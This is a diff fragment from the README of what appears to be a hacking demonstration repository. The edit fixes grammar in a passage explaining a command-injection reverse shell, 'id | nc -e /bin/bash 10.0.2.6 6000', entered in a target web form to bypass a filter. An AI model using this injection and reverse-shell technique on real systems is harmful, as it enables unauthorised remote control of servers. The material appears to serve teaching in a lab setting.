cristinavisentin/hackingdemo/README.md

 id | nc -e /bin/bash 10.0.2.6 6000
 ```

-is ran in the text box of the target web interface.
+is run in the text box of the target web interface.
 This command bypasses the filter and initiates a TCP connection: the web server will be the client side of the connection.
 Command options:
 - `id |` for filter circumvention;
 - `-e /bin/bash` specifies the program to execute after connection, in this case, a Bash shell.